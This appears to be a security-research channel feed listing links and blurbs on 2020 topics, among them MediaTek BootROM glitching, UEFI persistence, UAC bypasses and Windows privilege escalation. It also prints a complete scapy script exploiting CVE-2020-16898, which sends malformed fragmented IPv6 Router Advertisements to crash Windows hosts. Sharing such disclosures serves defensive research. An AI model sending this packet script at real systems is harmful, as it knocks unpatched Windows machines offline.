There’s A Hole In Your SoC: Glitching The MediaTek BootROM
https://research.nccgroup.com/2020/10/15/theres-a-hole-in-your-soc-glitching-the-mediatek-bootrom/
https://research.nccgroup.com/2020/10/15/theres-a-hole-in-your-soc-glitching-the-mediatek-bootrom/
Nccgroup
Cyber Security Research
Cutting-edge cyber security research from NCC Group. Find public reports, technical advisories, analyses, & other novel insights from our global experts.
Forwarded from Noise Security Bit (AM)
CVE-2020-16898 – Exploiting RCE "Bad Neighbor" vulnerability
https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html
https://blog.pi3.com.pl/?p=780
BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html
https://blog.pi3.com.pl/?p=780
BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
from scapy.all import *
v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
v6_src = "fe80::24f5:a2ff:fe30:8890"
p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4
c = ICMPv6NDOptEFA();
e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]
pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e
p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
IPv6ExtHdrFragment()/pkt
l=fragment6(p_test_frag, 200)
for p in l:
send(p)
Quarkslab
Beware the Bad Neighbor: Analysis and PoC of the Windows IPv6 Router Advertisement Vulnerability (CVE-2020-16898) - Quarkslab's…
This blog post analyzes the vulnerability known as "Bad Neighbor" or CVE-2020-16898, a stack-based buffer overflow in the IPv6 stack of Windows, which can be remotely triggered by means of a malformed Router Advertisement packet.
Introducing MIDNIGHTTRAIN - A Covert Stage-3 Persistence Framework weaponizing UEFI variables
https://slaeryan.github.io/posts/midnighttrain.html
https://slaeryan.github.io/posts/midnighttrain.html
Let’s build a high-performance fuzzer with GPUs!
https://blog.trailofbits.com/2020/10/22/lets-build-a-high-performance-fuzzer-with-gpus/
https://blog.trailofbits.com/2020/10/22/lets-build-a-high-performance-fuzzer-with-gpus/
The Trail of Bits Blog
Let’s build a high-performance fuzzer with GPUs!
TL;DR: Can we use GPUs to get 10x performance/dollar when fuzzing embedded software in the cloud? Based on our preliminary work, we think the answer is yes! Fuzzing is a software testing technique that supplies programs with many randomized inputs in an attempt…
The Many Faces of Emotet
https://spamauditor.org/2020/10/the-many-faces-of-emotet/
https://spamauditor.org/2020/10/the-many-faces-of-emotet/
Active Directory (AD) Attacks & Enumeration at the Network Layer
https://www.lares.com/blog/active-directory-ad-attacks-enumeration-at-the-network-layer/
https://www.lares.com/blog/active-directory-ad-attacks-enumeration-at-the-network-layer/
Lares
Active Directory (AD) Attacks & Enumeration at the Network Layer
Intro Defending an Active Directory environment, particularly a large one, is a daunting task. Telemetry generated by Active Directory itself as well as the hosts connected to it are critical…
Abusing Teams client protocol to bypass Teams security policies
https://o365blog.com/post/teams-policies/
https://o365blog.com/post/teams-policies/
Aadinternals
Abusing Teams client protocol to bypass Teams security policies
Administrators can use teams policies for controlling what users can do in Microsoft Teams.
In this blog, I’ll show that these policies are applied only in client and thus can be easily bypassed.
In this blog, I’ll show that these policies are applied only in client and thus can be easily bypassed.
Forwarded from Noise Security Bit (AM)
EoP 0-day exploited in the wild: Windows Kernel Cryptography Driver cng.sys pool-based buffer overflow in IOCTL 0x390400
PoC: https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=472684
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=2104
PoC: https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=472684
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=2104
UAC bypasses from COMAutoApprovalList
https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html
https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html
Blogspot
UAC bypasses from COMAutoApprovalList
Intro (This post is made with permission of Arush Agarampur - an original author of all methods described below). Here and below we assu...
OpenEDR is free and open source platform allows you to analyze what’s happening across your entire environment at base-security-event level.
https://github.com/ComodoSecurity/openedr
https://github.com/ComodoSecurity/openedr
GitHub
GitHub - ComodoSecurity/openedr: Open EDR public repository
Open EDR public repository. Contribute to ComodoSecurity/openedr development by creating an account on GitHub.
How the MVSC Compiler Generates XFG Function Prototype Hashes
https://blog.quarkslab.com/how-the-mvsc-compiler-generates-xfg-function-prototype-hashes.html
https://blog.quarkslab.com/how-the-mvsc-compiler-generates-xfg-function-prototype-hashes.html
Quarkslab
How the MVSC Compiler Generates XFG Function Prototype Hashes
Windows RpcEptMapper service insecure Registry permissions EoP
https://itm4n.github.io/windows-registry-rpceptmapper-eop/
https://itm4n.github.io/windows-registry-rpceptmapper-eop/
itm4n’s blog
Windows RpcEptMapper Service Insecure Registry Permissions EoP
If you follow me on Twitter, you probably know that I developed my own Windows privilege escalation enumeration script - PrivescCheck - which is a sort of updated and extended version of the famous PowerUp. If you have ever run this script on Windows 7 or…